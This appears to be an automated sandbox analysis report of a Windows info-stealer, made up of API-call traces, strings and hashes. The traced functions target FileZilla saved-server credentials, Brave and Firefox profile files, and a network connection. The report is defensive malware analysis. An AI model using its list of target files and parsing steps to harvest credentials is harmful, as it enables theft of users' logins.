                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C3E43
                                  • lstrlen.KERNEL32(002E1794), ref: 002C3E55
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C3E77
                                  • lstrcat.KERNEL32(00000000,002E1794), ref: 002C3E83
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C3EAC
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C3EDB
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002C3EE6
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C3F0D
                                  • lstrlen.KERNEL32(002E1794), ref: 002C3F1F
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C3F41
                                  • lstrcat.KERNEL32(00000000,002E1794), ref: 002C3F4D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C3F75
                                  • lstrlen.KERNEL32(?), ref: 002C3F89
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C3FA9
                                  • lstrcat.KERNEL32(00000000,?), ref: 002C3FB7
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C3FE0
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002C401F
                                  • lstrlen.KERNEL32(011CD688), ref: 002C402E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C4056
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002C4061
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C408A
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C40CE
                                  • lstrcat.KERNEL32(00000000), ref: 002C40DB
                                  • FindNextFileA.KERNEL32(00000000,?), ref: 002C42D9
                                  • FindClose.KERNEL32(00000000), ref: 002C42E8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$lstrlen$Find$File$CloseFirstNextwsprintf
                                  • String ID: %s\*.*
                                  • API String ID: 1006159827-1013718255
                                  • Opcode ID: 2ddbf3af10480f1001e604767cd33069587943e031ba210ba6c5095372e1c5ed
                                  • Instruction ID: 52d12505eb021a7734e1bdf6983550efc47555c310649d96735b22528d0ed320
                                  • Opcode Fuzzy Hash: 2ddbf3af10480f1001e604767cd33069587943e031ba210ba6c5095372e1c5ed
                                  • Instruction Fuzzy Hash: D2629D319206579BDB21EF64CC89FEEB7B9AF44340F148628F849A7251DB34DE25CB90
                                  Function 002C6960 Relevance: 144.3, APIs: 72, Strings: 10, Instructions: 763stringmemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002C6995
                                  • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 002C69C8
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C6A02
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C6A29
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002C6A34
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C6A5D
                                  • lstrlen.KERNEL32(\AppData\Roaming\FileZilla\recentservers.xml), ref: 002C6A77
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C6A99
                                  • lstrcat.KERNEL32(00000000,\AppData\Roaming\FileZilla\recentservers.xml), ref: 002C6AA5
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C6AD0
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C6B00
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 002C6B35
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002C6B9D
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002C6BCD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$AllocFolderLocalPathlstrlen
                                  • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                  • API String ID: 313953988-555421843
                                  • Opcode ID: ac6ebf02838c8347403c237dab6b0389ca0020d2da2fd19f19d6e30714e535a5
                                  • Instruction ID: 99dc565d1ebda2ba6be8b5f962a46abb22811d0f2dca772f2ce9c7df9dd7db12
                                  • Opcode Fuzzy Hash: ac6ebf02838c8347403c237dab6b0389ca0020d2da2fd19f19d6e30714e535a5
                                  • Instruction Fuzzy Hash: 09428F70A20246ABDB11AFB0DC89FAE7779AF44740F144529F946EB282DB34DD25CB50
                                  Function 002BDB99 Relevance: 125.0, APIs: 68, Strings: 3, Instructions: 763stringfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002BDBC1
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002BDBE4
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002BDBEF
                                  • lstrlen.KERNEL32(002E4CA8), ref: 002BDBFA
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002BDC17
                                  • lstrcat.KERNEL32(00000000,002E4CA8), ref: 002BDC23
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002BDC4C
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002BDC8F
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002BDCBF
                                  • FindFirstFileA.KERNEL32(00000000,?), ref: 002BDCD0
                                  • StrCmpCA.SHLWAPI(?,002E17A0), ref: 002BDCF0
                                  • StrCmpCA.SHLWAPI(?,002E17A4), ref: 002BDD0A
                                  • lstrlen.KERNEL32(002DCFEC), ref: 002BDD1D
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002BDD47
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002BDD70
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002BDD7B
                                  • lstrlen.KERNEL32(002E1794), ref: 002BDD86
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002BDDA3
                                  • lstrcat.KERNEL32(00000000,002E1794), ref: 002BDDAF
                                  • lstrlen.KERNEL32(?), ref: 002BDDBC
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002BDDDF
                                  • lstrcat.KERNEL32(00000000,?), ref: 002BDDED
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002BDE19
                                  • lstrlen.KERNEL32(002E1794), ref: 002BDE3D
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002BDE6F
                                  • lstrcat.KERNEL32(00000000,002E1794), ref: 002BDE7B
                                  • lstrlen.KERNEL32(011C90F8), ref: 002BDE8A
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002BDEB0
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002BDEBB
                                  • lstrlen.KERNEL32(002E1794), ref: 002BDEC6
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002BDEE6
                                  • lstrcat.KERNEL32(00000000,002E1794), ref: 002BDEF2
                                  • lstrlen.KERNEL32(011C9228), ref: 002BDF01
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002BDF27
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002BDF32
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002BDF5E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002BDFA5
                                  • lstrcat.KERNEL32(00000000,002E1794), ref: 002BDFB1
                                  • lstrlen.KERNEL32(011C90F8), ref: 002BDFC0
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002BDFE9
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002BDFF4
                                  • lstrlen.KERNEL32(002E1794), ref: 002BDFFF
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002BE022
                                  • lstrcat.KERNEL32(00000000,002E1794), ref: 002BE02E
                                  • lstrlen.KERNEL32(011C9228), ref: 002BE03D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002BE063
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002BE06E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002BE09A
                                  • StrCmpCA.SHLWAPI(?,Brave), ref: 002BE0CD
                                  • StrCmpCA.SHLWAPI(?,Preferences), ref: 002BE0E7
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002BE11F
                                  • lstrlen.KERNEL32(011CD688), ref: 002BE12E
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002BE155
                                  • lstrcat.KERNEL32(00000000,?), ref: 002BE15D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002BE19F
                                  • lstrcat.KERNEL32(00000000), ref: 002BE1A9
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002BE1D0
                                  • CopyFileA.KERNEL32(00000000,?,00000001), ref: 002BE1F9
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002BE22F
                                  • lstrlen.KERNEL32(011C9248), ref: 002BE23D
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002BE261
                                  • lstrcat.KERNEL32(00000000,011C9248), ref: 002BE269
                                  • FindNextFileA.KERNEL32(00000000,?), ref: 002BE988
                                  • FindClose.KERNEL32(00000000), ref: 002BE997
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$lstrlen$FileFind$CloseCopyFirstNext
                                  • String ID: Brave$Preferences$\Brave\Preferences
                                  • API String ID: 1346089424-1230934161
                                  • Opcode ID: 7604c332cec60189ccd2a8748243577bd4b3d12c2ccd9c14b743f60127e47ec2
                                  • Instruction ID: 16233afd37169bc860a332ed7c1ca20013fa202ae1cbe6b0d6463c9ac81be601
                                  • Opcode Fuzzy Hash: 7604c332cec60189ccd2a8748243577bd4b3d12c2ccd9c14b743f60127e47ec2
                                  • Instruction Fuzzy Hash: A3528C709217479BDF21EF64DC89AEE77B9AF44380F154028F84AAB251DB34DC25CB90
                                  Function 002B60D0 Relevance: 119.8, APIs: 66, Strings: 2, Instructions: 818stringnetworkCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002B60FF
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002B6152
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002B6185
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002B61B5
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002B61F0
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002B6223
                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 002B6233
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$InternetOpen
                                  • String ID: "$------
                                  • API String ID: 2041821634-2370822465
                                  • Opcode ID: d6f5ac04921945910576f616593ca1e7397bcb951ca1aaa027f97395cfc25d82
                                  • Instruction ID: dd40ee259994e1602c7d34e9f40ffcf04c6d62f06f472e0b19c6b25535f34640
                                  • Opcode Fuzzy Hash: d6f5ac04921945910576f616593ca1e7397bcb951ca1aaa027f97395cfc25d82
                                  • Instruction Fuzzy Hash: C65270719206569BDB21EFB4DC89AEE77B9AF44380F144024F849EB252DB38EC15CF94
                                  Function 002C6B79 Relevance: 110.8, APIs: 54, Strings: 9, Instructions: 536stringmemoryencryptionCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002C6B9D
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002C6BCD
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002C6BFD
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002C6C2F
                                  • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 002C6C3C
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 002C6C43
                                  • StrStrA.SHLWAPI(00000000,<Host>), ref: 002C6C5A
                                  • lstrlen.KERNEL32(00000000), ref: 002C6C65
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C6CA8
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C6CCF
                                  • StrStrA.SHLWAPI(00000000,<Port>), ref: 002C6CE2
                                  • lstrlen.KERNEL32(00000000), ref: 002C6CED
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C6D30
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C6D57
                                  • StrStrA.SHLWAPI(00000000,<User>), ref: 002C6D6A
                                  • lstrlen.KERNEL32(00000000), ref: 002C6D75
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C6DB8
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C6DDF
                                  • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 002C6DF2
                                  • lstrlen.KERNEL32(00000000), ref: 002C6E01
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C6E49
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C6E71
                                  • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 002C6E94
                                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 002C6EA8
                                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 002C6EC9
                                  • LocalFree.KERNEL32(00000000), ref: 002C6ED4
                                  • lstrlen.KERNEL32(?), ref: 002C6F6E
                                  • lstrlen.KERNEL32(?), ref: 002C6F81
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$BinaryCryptHeapLocalString$AllocAllocateFreeProcess
                                  • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$browser: FileZilla$login: $password: $profile: null$url:
                                  • API String ID: 2641759534-2314656281
                                  • Opcode ID: 430ba283c9e8457014ed82731328c887c836be7b14ddbbf2dce66e1948ccf17d
                                  • Instruction ID: 62be46527967e072371eb9208c3ec0e38d0f5aad384a0f778667f9f3e6c4dd5e
                                  • Opcode Fuzzy Hash: 430ba283c9e8457014ed82731328c887c836be7b14ddbbf2dce66e1948ccf17d
                                  • Instruction Fuzzy Hash: 8A028F70A20256AFDB11AFB0DC8DFAE7B79AF04740F144569F846EB282DB34DD258B50
                                  Function 002C4B10 Relevance: 79.8, APIs: 44, Strings: 1, Instructions: 1095stringfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002C4B51
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C4B74
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002C4B7F
                                  • lstrlen.KERNEL32(002E4CA8), ref: 002C4B8A
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C4BA7
                                  • lstrcat.KERNEL32(00000000,002E4CA8), ref: 002C4BB3
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C4BDE
                                  • FindFirstFileA.KERNEL32(00000000,?), ref: 002C4BFA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                  • String ID: prefs.js
                                  • API String ID: 2567437900-3783873740
                                  • Opcode ID: 28d72d2a8b6553aa82b279de52e06ee19f103b17cbb42462b36f7ddf24047222
                                  • Instruction ID: fb0df2cfa585c6a8fc56b26968574f11652f675e7f758549dfa9df5a2cbf3512
                                  • Opcode Fuzzy Hash: 28d72d2a8b6553aa82b279de52e06ee19f103b17cbb42462b36f7ddf24047222
                                  • Instruction Fuzzy Hash: 4D924270A21652CFDB24DF19C988F6AB7E5AF44314F1981ADE8099B3A2D771EC91CF40
                                  Function 002C1250 Relevance: 62.0, APIs: 41, Instructions: 525stringfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002C1291
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C12B4
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002C12BF
                                  • lstrlen.KERNEL32(002E4CA8), ref: 002C12CA
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C12E7
                                  • lstrcat.KERNEL32(00000000,002E4CA8), ref: 002C12F3
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C131E
                                  • FindFirstFileA.KERNEL32(00000000,?), ref: 002C133A
                                  • StrCmpCA.SHLWAPI(?,002E17A0), ref: 002C135C
                                  • StrCmpCA.SHLWAPI(?,002E17A4), ref: 002C1376
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002C13AF
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002C13D7
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002C13E2
                                  • lstrlen.KERNEL32(002E1794), ref: 002C13ED
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C140A
                                  • lstrcat.KERNEL32(00000000,002E1794), ref: 002C1416
                                  • lstrlen.KERNEL32(?), ref: 002C1423
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C1443
                                  • lstrcat.KERNEL32(00000000,?), ref: 002C1451
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C147A
                                  • StrCmpCA.SHLWAPI(?,011CD670), ref: 002C14A3
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002C14E4
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002C150D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C1535
                                  • StrCmpCA.SHLWAPI(?,011CD9B0), ref: 002C1552
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002C1593
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002C15BC
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C15E4
                                  • StrCmpCA.SHLWAPI(?,011CD520), ref: 002C1602
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C1633
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002C165C
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002C1685
